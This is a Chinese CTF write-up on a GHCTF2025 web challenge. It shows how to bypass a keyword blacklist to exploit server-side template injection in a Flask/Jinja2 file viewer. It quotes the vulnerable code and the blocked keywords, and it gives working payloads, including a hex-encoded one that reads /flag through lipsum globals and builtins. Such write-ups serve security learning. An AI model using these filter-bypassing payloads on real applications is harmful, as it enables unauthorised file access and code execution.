GHCTF2025-WEB题解:如何用SSTI绕过WAF黑名单(附实战payload)

从GHCTF2025实战出发:深度拆解SSTI黑名单绕过策略与高阶Payload构造

最近在GHCTF2025的WEB赛道上,一道看似简单的文件上传题目,却让不少选手陷入了“知道有洞,但payload总被拦截”的困境。这道题表面上是文件上传,实际上却是一场针对SSTI(服务器端模板注入)绕过能力的深度考验。我在实际测试中发现,很多选手能够快速识别出SSTI漏洞的存在,但在面对严格的黑名单过滤时,却往往束手无策,反复尝试的payload都被WAF无情拦截。

这种情况在真实的渗透测试和CTF比赛中并不少见。WAF(Web应用防火墙)的过滤规则越来越智能,传统的{ {7*7}}测试虽然能确认漏洞,但真正要执行命令、读取文件时,那些包含osflag__builtins__等关键词的payload几乎都会被第一时间拦截。这道题的精妙之处在于,它模拟了一个相对真实的防御环境——不仅过滤常见敏感词,还对下划线这种在Python反射中至关重要的字符进行了拦截。

本文将从实战角度出发,不局限于GHCTF2025这一道题目,而是系统性地探讨SSTI黑名单绕过的核心思路、技术原理和进阶技巧。我会结合自己多次踩坑的经验,分享几种真正有效的绕过方法,并深入分析每种方法背后的Python/Jinja2特性。无论你是CTF新手,还是有一定经验的安全爱好者,相信都能从中获得实用的技术提升。

1. 理解题目环境与WAF过滤机制

在开始构造绕过payload之前,我们必须先彻底理解题目设置的防御环境。很多选手失败的原因不是技术不行,而是没有仔细分析过滤规则,盲目尝试各种已知的payload。

1.1 代码审计:识别真正的攻击面

题目虽然以文件上传为入口,但通过代码审计可以发现,上传功能本身被严格限制:

ALLOWED_EXTENSIONS = {'txt', 'log', 'text','md','jpg','png','gif'} def allowed_file(filename): return '.' in filename and \ filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS 

这是典型的白名单过滤,只允许特定扩展名的文件。更重要的是secure_filename()函数的使用,它会清理文件名中的特殊字符,防止路径遍历等攻击。真正的漏洞点在于文件查看功能:

tmp_str = """<!DOCTYPE html> <html lang="zh"> <head>...</head> <body> <h1>文件内容:{name}</h1> <pre>{data}</pre> </body> </html>""".format(name=safe_filename, data=file_data) return render_template_string(tmp_str) 

这里的关键是render_template_string()函数,它将用户控制的文件内容直接渲染为模板。如果文件内容包含Jinja2模板语法,就会被执行。

1.2 WAF黑名单分析

题目中的WAF实现相对简单但有效:

def contains_dangerous_keywords(file_path): dangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__', 'flag',] with open(file_path, 'rb') as f: file_content = str(f.read()) for keyword in dangerous_keywords: if keyword in file_content: return True return False 

这个过滤列表设计得相当有针对性:

过滤关键词在SSTI中的作用绕过难度
_属性访问分隔符、双下划线前缀
os执行系统命令的关键模块
subclasses获取子类链的核心方法
__builtins__内置函数和模块的入口
__globals__访问全局命名空间
flag目标文件名
注意:这里的过滤是内容检测,不是参数名检测。这意味着即使我们将payload放在URL参数中,只要文件内容包含这些关键词,就会被拦截。

1.3 初步测试与漏洞确认

在构造复杂payload之前,先用最简单的测试确认漏洞:

# 创建测试文件 echo '{ {7*7}}' > test.txt # 上传后访问 curl http://target/file/test.txt 

如果返回的页面中显示49而不是{ {7*7}},就确认了SSTI漏洞的存在。这个测试payload不包含任何黑名单关键词,所以能顺利通过WAF。

2. 基础绕过技术:编码与字符串操作

当直接使用敏感关键词被拦截时,最直接的思路就是不让这些关键词以明文形式出现。编码和字符串操作是绕过关键词过滤的经典方法。

2.1 十六进制编码绕过

Python和Jinja2都支持十六进制表示法,这为我们绕过关键词检测提供了可能。在Python字符串中,\x后跟两个十六进制数字表示一个字符。

原始payload(会被拦截):

{ { lipsum.__globals__.__builtins__.open('/flag').read() }} 

十六进制编码版本:

{ { lipsum["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["open"]("/fla\x67").read() }} 

Read more

前端单元测试:构建高质量代码的基石

前端单元测试:构建高质量代码的基石

🤍 前端开发工程师、技术日更博主、已过CET6 🍨 阿珊和她的猫_ZEEKLOG博客专家、23年度博客之星前端领域TOP1 🕠 牛客高级专题作者、打造专栏《前端面试必备》 、《2024面试高频手撕题》、《前端求职突破计划》 🍚 蓝桥云课签约作者、上架课程《Vue.js 和 Egg.js 开发企业级健康管理项目》、《带你从入门到实战全面掌握 uni-app》 文章目录 * * 摘要 * 一、引言 * 二、前端单元测试基础概念 * 2.1 什么是单元测试 * 2.2 单元测试的重要性 * 三、常用的前端单元测试工具与框架 * 3.1 测试框架 * 3.2 断言库 * 3.3 测试运行器 * 四、前端单元测试实践 * 4.1 测试编写流程 * 4.

By Ne0inhk
从零构建企业级前端多主题切换系统:架构设计与实战

从零构建企业级前端多主题切换系统:架构设计与实战

当“一键换肤”从炫技功能变为基础需求,我们该如何设计一个可维护、可扩展、高性能的主题系统? 今年,随着各大操作系统和主流应用全面拥抱深色模式,以及越来越多产品提供“春节红”、“国庆金”等节日限定皮肤,前端多主题切换已成为现代Web应用的标配功能。然而,许多团队在实现时,往往止步于简单的CSS变量替换,随着业务复杂度的提升,代码会变得难以维护:主题色散落在各处、新增主题成本高昂、动态切换性能堪忧。 本文将基于一个真实的复杂后台管理系统重构案例,为你深入剖析如何从前端架构角度,设计并实现一个生产级的多主题系统。我们将从设计模式选型开始,一直深入到Webpack插件优化,提供完整的解决方案和可复用的代码。 一、需求分析:为什么简单的CSS变量不够用? 在我们接手的一个中后台管理系统中,主题系统最初只包含“浅色”和“深色”两套,采用CSS自定义属性(CSS Variables)实现。但随着业务发展,暴露出以下痛点: 1. 主题维度单一:仅支持颜色切换,但业务方需要同时支持“紧凑/宽松”的间距主题、“圆角/

By Ne0inhk
InfiniteTalk V2版 - 声音驱动图片生成高度逼真的说话/唱歌视频 支持50系显卡 ComfyUI+WebUI 一键整合包下载

InfiniteTalk V2版 - 声音驱动图片生成高度逼真的说话/唱歌视频 支持50系显卡 ComfyUI+WebUI 一键整合包下载

InfiniteTalk 是一个能根据音频生成无限时长人物说话/唱歌视频的AI模型,无论是给现有视频配音,还是让静态图片“开口说话”,还是让人物图片“唱歌”,它都能实现精准的唇形同步和自然的肢体动作。 今天分享的 InfiniteTalk V2版 ,基于上个版本 的工作流更新升级,新增了适合新手小白操作的WebUI,如果是使用ComfyUI且下载过上个ComfyUI的老司机,无需下载这个版本。WebUI支持自定义切换Wan主模型和InfiniteTalk 模型,网盘自带Q4和Q8两个版本,大家根据自己的显卡切换。当前WebUI只支持单人生成,下个版本会集成双人版。   下载地址:点此下载 核心特点 ‌ 全维度同步‌   不仅唇形与音频匹配,还会自动生成对应的‌头部转动、身体姿态和面部表情‌,让虚拟人物更生动。 传统配音工具只调整嘴唇,而InfiniteTalk连肢体语言一起模拟。 无限时长生成‌   支持超长视频生成(如1小时以上),通过分段处理技术保证连贯性。 普通AI视频模型通常限制在几十秒内。 双模式输入‌  ‌ 视频+音频‌:给现有视频换配音(如翻译配音、内容修改

By Ne0inhk